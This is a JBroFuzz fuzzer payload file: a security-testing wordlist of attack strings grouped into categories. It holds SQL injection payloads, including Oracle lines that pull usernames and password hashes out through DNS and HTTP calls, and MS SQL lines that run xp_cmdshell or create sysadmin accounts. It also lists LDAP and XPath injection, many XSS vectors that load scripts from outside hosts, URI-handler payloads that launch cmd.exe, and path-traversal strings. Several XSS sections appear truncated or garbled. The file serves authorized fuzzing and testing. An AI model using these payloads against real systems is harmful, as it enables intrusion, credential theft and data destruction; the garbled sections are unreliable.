Many resources are needed to download a project. Please understand that we have to compensate our server costs. Thank you in advance. Project price only 1 $
You can buy this project and download/modify it how often you want.
#
# JBroFuzz Fuzzer Prototypes
#
# Copyright (c) 2010
# [email protected]
# version 2.4
#
P:001-HTT-PMT:HTTP Methods:15
> HTTP | Replacive Fuzzers
>>This is a comment line to be changed in the future
get
post
head
put
delete
trace
propfind
options
copy
move
mkcol
proppatch
lock
unlock
search
P:002-INT-OVF:Integer Overflows:12
> Exploits | Replacive Fuzzers | Integer Overflows
>>This is a comment line to be changed in the future
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
P:003-FSE-STR:Format String Payloads:19
> Exploits | Replacive Fuzzers | Format String Errors
>>This is a comment line to be changed in the future
%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%z%t%i%e%g%f%a%c%s%08x%%
f(x)=%sasdf x 129
f(x)=%x x 257
P:004-SQL-INJ:SQL Injection:16
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
a
a'
a' --
a' or 1=1; --
@
?
' and 1=0) union all
? or 1=1 --
x' and userid is NULL; --
x' and email is NULL; --
anything' or 'x'='x
x' and 1=(select count(*) from tabname); --
x' and members.email is NULL; --
x' or full_name like '%bob%
23 or 1=1; --
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
P:005-SQL-INJ:MySQL Injection 101:4
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
a
1 or 1=1
1' or '1'='1
1 and user_name() = 'dbo'
P:006-SQL-INJ:MySQL Injection (Blind):5
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
1
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
P:007-SQL-INJ:MySQL/MS SQL Common Injection:9
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
P:008-SQL-INJ:Oracle SQL Injection:54
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
P:009-SQL-INJ:Passive SQL Injection:55
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' or 1=1--
or 1=1
' or '1'='1
; or '1'='1'
" or isNULL(1/0) /*
' or '7659'='7659
" or isNULL(1/0) /*
' --
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
admin' or '
' select * from information_schema.tables--
) union select * from information_schema.tables;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' or 'unusual' = 'unusual'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'something' like 'some%'
' or 2 > 1
' or 'text' > 't'
' or 'whatever' in ('whatever')
' or 2 between 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
password:*/=1--
uni/**/on sel/**/ect
'; execute immediate 'sel' || 'ect us' || 'er'
'; exec ('sel' + 'ect us' + 'er')
'/**/or/**/1/**/=/**/1
' or 1/*
or isNULL(1/0) /*
' or '7659'='7659
" or isNULL(1/0) /*
' -- &password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --
' and 1 in (select var from temp)--
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
P:010-SQL-INJ:Active SQL Injection:9
> Replacive Fuzzers | SQL Injection| Injection
>>This is a comment line to be changed in the future
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
create user name identified by 'pass123'
create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
grant connect to name; grant resource to name;
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
P:011-SQL-INJ:MS SQL Injection i:8
> SQL Injection | Injection | Replacive Fuzzers
>>This is a comment line to be changed in the future
a
' or 1=1 --
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
P:012-SQL-INJ:MS SQL Ninja Injection (Blind):9
> SQL Injection | Injection | Replacive Fuzzers
>>This is a comment line to be changed in the future
a
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
P:013-LDP-INJ:LDAP Injection:14
> Replacive Fuzzers | LDAP Injection | Injection
>>This is a comment line to be changed in the future
|
!
(
)
&
!
|
*|
*(|(mail=*))
*(|(objectclass=*))
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*
P:014-XPT-INJ:XPath Injection:10
> Replacive Fuzzers | XPath Injection | Injection
>>This is a comment line to be changed in the future
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
P:015-XSS-101:XSS 101:9
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
'>
`>
>
<
>"'
P:016-XSS-102:XSS 102:10
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
'';!--"=&{()}
*/a=eval;b=alert;a(b(/e/.source));/*
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
MOVE MOUSE OVER THIS AREA
perl -e 'print "alert("XSS")";' > out
Div Body
P:017-XSS-JSB:XSS JS Breaks:11
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
alert(1)
A=alert;A(1)
+alert(0)+
';//%0da=eval;b=alert;a(b(9));//
a=1;a=eval;b=alert;a(b(11));//
'};a=eval;b=alert;a(b(13));//
1};a=eval;b=alert;a(b(14));//
'];a=eval;b=alert;a(b(15));//
1];a=eval;b=alert;a(b(17));//
1;a=eval;b=alert;a(b(/c/.source));
xyz onerror=alert(6);
P:018-XSS-4IE:XSS Internet Explorer:38
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
style=color: expression(alert(0));" a="
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
exp/*
XSS
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
>%22%27>
P:019-XSS-GEK:XSS Gecko:11
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
">'>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}
'';!--"=&{(alert(1))}
MOVE MOUSE OVER THIS AREA
'';!--"=&{()}
P:022-XSS-EMB:XSS Embed/Evade:10
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
PT SRC="http://ha.ckers.org/xss.js">
P:023-XSS-IMG:XSS Image Tag:10
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
">",
P:024-XSS-NET:ASP .NET validateRequest:5
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
XSS-STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
">
P:025-XSS-XML:XSS XML Injection:6
> XSS | XML Injection | Replacive Fuzzers | Injection
>>This is a comment line to be changed in the future
]]>xssalert(document.cookie);
P:026-XSS-URI:URI Cross Site Scripting:4
> XSS | URI Exploits | Replacive Fuzzers
>>This is a comment line to be changed in the future
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
P:027-XSS-JSN:JSON:5
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
XSS | Replacive Fuzzers | Web Server
>>This is a comment line to be changed in the future
P:029-PTH-SMF:Sample Files:2
> Web Server | Replacive Fuzzers
>>This is a comment line to be changed in the future
/../.. /../../../boot.ini
/../../../../../winnt/repair/setup.log
P:030-XSS-BRK:URL Breaking:3
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
httP://aa">
httP://aa'>
httP://aa
R:031-B16-HEX:Base16 (HEX):16
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
8
9
a
b
c
d
e
f
R:032-B10-DEC:Base10 (DEC):10
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
8
9
R:033-B08-OCT:Base08 (OCTAL):8
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
R:034-B02-BIN:Base02 (binary):2
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
R:035-B36-ALP:Alpha Numeric:36
> Alphabets | Recursive Fuzzers
>>This is a comment line to be changed in the future
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
5
6
7
8
9
R:036-ALP-HAB:English Alphabet:26
> Alphabets | Recursive Fuzzers
>>This is a comment line to be changed in the future
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
R:037-B64-RFC:Base64 Alphabet:64
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
5
6
7
8
9
+
/
=
R:038-B64-URL:Base64 (URL/File Safe) Alphabet:64
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
5
6
7
8
9
-
_
=
R:039-B32-RFC:Base32 Alphabet:32
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
2
3
4
5
6
7
=
R:040-B32-HEX:Base32 (Extended HEX) Alphabet:32
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
8
9
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
=
P:041-BFO-EXP:Long Strings of aaa's:17
> Exploits | Buffer Overflows
>>This is a comment line to be changed in the future
a
f(x)=a x 3
f(x)=a x 5
f(x)=a x 9
f(x)=a x 17
f(x)=a x 33
f(x)=a x 65
f(x)=a x 129
f(x)=a x 257
f(x)=a x 513
f(x)=a x 1025
f(x)=a x 2049
f(x)=a x 4197
f(x)=a x 8193
f(x)=a x 16385
f(x)=a x 32769
f(x)=a x 65537
R:042-DNA-ALP:DNA Fuzzer:4
> Biology | Alphabets
>>This is a comment line to be changed in the future
a
t
c
g
P:043-XSS-AXL:MS Anti-XSS lib_v3.0:78
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://testsite.com/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://testsite.com/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://testsite.com/xss.css">
<STYLE>@import'http://testsite.com/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://testsite.com/xss.htc);">
<SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT>
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " >
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://testsite.com/xss.js
<SCRIPT SRC=//testsite.com/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://testsite.com/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">
<SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT>
P:044-USR-AGN:All User Agents:29
> HTTP | Replacive Fuzzers | User Agents | Headers
>> Impersonate different browsers and operating systems by modifying the User-Agent header field
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)
User-Agent: Mozilla/4.79 [en] (WinNT; U)
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
